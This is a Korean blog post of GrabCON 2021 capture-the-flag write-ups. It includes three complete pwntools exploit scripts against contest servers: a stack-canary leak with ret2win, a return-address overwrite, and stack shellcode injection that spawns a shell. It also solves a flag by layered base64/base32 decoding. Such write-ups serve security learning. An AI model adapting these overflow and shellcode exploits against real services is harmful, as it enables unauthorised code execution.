Grabcon2021 Write-up

CTF-Writeup 2021. 9. 17. 00:22

728x90

PWN

cancancan

cancancan
0.02MB

풀고나서 바로 롸업을 안써서 어케 풀었는지 까먹었따..

아마 카나리 릭 하고 푸는 문제인듯

from pwn import *

p = remote('35.246.42.94', 31337)
e = ELF('./cancancan')

win = 0x8049236
payload = b""
payload += b"A"*99+b"B"
p.sendlineafter('me???\n', payload)
p.recv(101)
canary = u32(b"\x00"+p.recv(3))
log.info(f'canary: {hex(canary)}')

payload1 = b"C"*100
payload1 += p32(canary)
payload1 += b"D"*12
payload1 += p32(win)

p.sendline(payload1)
p.interactive()

 

easybin

easybin
0.02MB

그냥 rtl문제

from pwn import *

p = remote('35.205.161.145', 49153)
e = ELF('./easybin')

vuln = 0x401146

p.sendline(b"B"*0x38+p64(vuln))

p.interactive()

 

pwn2

스택의 주소를 릭하고, 스택에 쉘코드 넣은 후 ret에 쉘코드가 들어간 스택의 주소를 넣어주면 끝

from pwn import *

p = remote('35.246.42.94', 1337)
e = ELF('./pwn2')
p.recvuntil('some ')
stack = int(p.recvuntil('!\n')[:-2], 16)
log.info(f'stack: {hex(stack)}')
shellcode = asm(shellcraft.i386.sh())

payload = shellcode
payload += b"\x90"*(298 - len(shellcode))
payload += b"B"*4
payload += p32(stack)

p.sendline(payload)
p.interactive()

 

MISC

유튜브의 설명창에 나오는 부분부분 플래그를 합치면됨

GrabCON{th3_qu1ck_br0wn_f0x_jumps_0v3r_th3_lazy_d0g}

 

REV

mukesh

파일을 열어보면 이러한 문자열이 나온다

S01ZRENXU1NJVkhGUVZKUkpaRkZNMlNLSTVKVENWU0xLVlZYQVlLVElaTkVVVlRNS0pIRkc2U1dKVkpHV01LWEtaQ1VVVENXTlJORlNVS1dOUkdGS01EVUs1S0dXVlNLS1pDWFFUQ1ROUllFT1VUTE1STFZDTUxFSk5MR1c0Q0lLWVlEQ1RDWEtWMkZNVjJWTkJKRk1SS09MQktHV05EWktKV0U0VlNOTlJTRVdWVEtLSkxWR01CUklOTEdXNUNQS05XRkVSQ1dLWkhFSVVaUk9CTUZFMjJXS1ZKVENXU0tLWlZWVVJTVUdGTEZLVkNGR0ZIVTRSU1ZQRkdXWVRTTUtOVlRLVEtTR0ZSVEFVSlFNUkdGSVZUTUs1SkZNVExaS1pWWElWMk5OTkxFNFZUS0pKTFZJUkxRSlZKR1dNS1RLTVlEU1RDVk5OMkVRVjJXSlpLRk1WTFVKTkpUQ1VTRUtaV0U0VjJTR0JORklVU1dNUkxGTVJMVUpSSldXNkNYS0lZVlVSQ1RHQVlVT1ZDRk1STUU0VktPS0ZKVENTU0VLWldGTVZLUkdGU0U2VkxMTVJNVktNS1dNRktXV09LREtFWUZVVUNWTk4yRVFVWlJPQkdGTVJLT0s1S1RBM0NNS0pWWFFTQ1hLWlNFSVZMTE1SRFZJMjIySlJMR1dUU0hLSVlWVVMyV05OU0ZHVTMySkpGRksyM0VLVklWTVVTVUtSS1hJVDJXR0JORk1WTDJKSk1GRU1DMktOTEVLUlNXS05XRU1VQ1JOTlNFT1ZEMkpGNUZPVkxMR0ZKVEFXU09LWVlVNFJTVEdGWUVJVlJRTlJKRTIyWlZKNUtHV05LR0tWTEZVVkNXTk00VUdVM0xMSkZGSzIzWUtKSldXU1NMS0lZV0dNS1JHRkpFWVZMTEpaTVZLVlNPSlJLVEE1Q1NLNUtWRVZDV0tWSEZNVVJRSVVZRk0yMkdLWkpXVVZTSktaS0RBT0tRS1FZRFNVQ1JIVTZRPT09PQ==

위 문자열을 base 인코딩으로 요리조리 지지고볶으면 됨

S01ZRENXU1NJVkhGUVZKUkpaRkZNMlNLSTVKVENWU0xLVlZYQVlLVElaTkVVVlRNS0pIRkc2U1dKVkpHV01LWEtaQ1VVVENXTlJORlNVS1dOUkdGS01EVUs1S0dXVlNLS1pDWFFUQ1ROUllFT1VUTE1STFZDTUxFSk5MR1c0Q0lLWVlEQ1RDWEtWMkZNVjJWTkJKRk1SS09MQktHV05EWktKV0U0VlNOTlJTRVdWVEtLSkxWR01CUklOTEdXNUNQS05XRkVSQ1dLWkhFSVVaUk9CTUZFMjJXS1ZKVENXU0tLWlZWVVJTVUdGTEZLVkNGR0ZIVTRSU1ZQRkdXWVRTTUtOVlRLVEtTR0ZSVEFVSlFNUkdGSVZUTUs1SkZNVExaS1pWWElWMk5OTkxFNFZUS0pKTFZJUkxRSlZKR1dNS1RLTVlEU1RDVk5OMkVRVjJXSlpLRk1WTFVKTkpUQ1VTRUtaV0U0VjJTR0JORklVU1dNUkxGTVJMVUpSSldXNkNYS0lZVlVSQ1RHQVlVT1ZDRk1STUU0VktPS0ZKVENTU0VLWldGTVZLUkdGU0U2VkxMTVJNVktNS1dNRktXV09LREtFWUZVVUNWTk4yRVFVWlJPQkdGTVJLT0s1S1RBM0NNS0pWWFFTQ1hLWlNFSVZMTE1SRFZJMjIySlJMR1dUU0hLSVlWVVMyV05OU0ZHVTMySkpGRksyM0VLVklWTVVTVUtSS1hJVDJXR0JORk1WTDJKSk1GRU1DMktOTEVLUlNXS05XRU1VQ1JOTlNFT1ZEMkpGNUZPVkxMR0ZKVEFXU09LWVlVNFJTVEdGWUVJVlJRTlJKRTIyWlZKNUtHV05LR0tWTEZVVkNXTk00VUdVM0xMSkZGSzIzWUtKSldXU1NMS0lZV0dNS1JHRkpFWVZMTEpaTVZLVlNPSlJLVEE1Q1NLNUtWRVZDV0tWSEZNVVJRSVVZRk0yMkdLWkpXVVZTSktaS0RBT0tRS1FZRFNVQ1JIVTZRPT09PQ==
base 64

KMYDCWSSIVHFQVJRJZFFM2SKI5JTCVSLKVVXAYKTIZNEUVTMKJHFG6SWJVJGWMKXKZCUUTCWNRNFSUKWNRGFKMDUK5KGWVSKKZCXQTCTNRYEOUTLMRLVCMLEJNLGW4CIKYYDCTCXKV2FMV2VNBJFMRKOLBKGWNDZKJWE4VSNNRSEWVTKKJLVGMBRINLGW5CPKNWFERCWKZHEIUZROBMFE22WKVJTCWSKKZVVURSUGFLFKVCFGFHU4RSVPFGWYTSMKNVTKTKSGFRTAUJQMRGFIVTMK5JFMTLZKZVXIV2NNNLE4VTKJJLVIRLQJVJGWMKTKMYDSTCVNN2EQV2WJZKFMVLUJNJTCUSEKZWE4V2SGBNFIUSWMRLFMRLUJRJWW6CXKIYVURCTGAYUOVCFMRME4VKOKFJTCSSEKZWFMVKRGFSE6VLLMRMVKMKWMFKWWOKDKEYFUUCVNN2EQUZROBGFMRKOK5KTA3CMKJVXQSCXKZSEIVLLMRDVI222JRLGWTSHKIYVUS2WNNSFGU32JJFFK23EKVIVMUSUKRKXIT2WGBNFMVL2JJMFEMC2KNLEKRSWKNWEMUCRNNSEOVD2JF5FOVLLGFJTAWSOKYYU4RSTGFYEIVRQNRJE22ZVJ5KGWNKGKVLFUVCWNM4UGU3LLJFFK23YKJJWWSSLKIYWGMKRGFJEYVLLJZMVKVSOJRKTA5CSK5KVEVCWKVHFMURQIUYFM22GKZJWUVSJKZKDAOKQKQYDSUCRHU6Q====
base 32

KMYDCWSSIV2FKUJRJZHVIVTMK5LFMVTBKVVXAYKSKVNEITLKJZFFGVCWJVJGWMKYKUYHQTCWNN2FSU2WJV4VKMBVKNJTCUSCKZWFETKVIVFEOUTLMN4U22SKJNLGW4CGKMYVES2VKV2EMV2VLJLFMRKOKRKGYSSUKJKTCVSVGFSEWUTKKJLVGVCKMFLGW5CPKRCVUTCWNRGXSUZROBCFORKGKZKTCVSIKFLGYWCRGFNFKVCFGVJVGRK2IRGTATSMKNWFUS2WGFRTAUJQOBGFO23YI5KFMWSEKZCWIQ2NNNNEQVSVOBJFIRLQJBJGW5CTKRCXQSKSKQYDSUCUGA4VAUJ5HU======

KMYDKTCSNMYVUUZRJZEFC23II5LFMWSLKVKXIS2SNRKTAVTLPBFFG222JVJEKTJQKEYFUTCSNRSEMUSWJF4VI2ZVKNLFKVS2KZCXAUSUGAYWCVTLNRHFC3CKJVJWW4CJKZLFMVCTGB2FGUJQLJGFKRLLHE======

KNKFMYKSGBHFUVJQKJFU4VLIJFLDC4CFKFWEER2NNRUEYTJQOMZVIMBRLJJHUUSKKRCFKPI=

GrabCON{dayuum_s0n!}

base 64 -> base 32 -> base 64 -> base 32 -> base 64 -> base 32 -> base 64 -> base 32 -> base 64 -> base 32
728x90

'CTF-Writeup' 카테고리의 다른 글

ACSC(Asia Cyber Security Challenge) 2021 Writeup  (0) 2021.09.19
2021 tamuctf Writeup  (0) 2021.09.17
DCTF 2021 Write-up  (0) 2021.08.23
corCTF 2021 Write-up  (0) 2021.08.23
RARCTF 2021  (0) 2021.08.10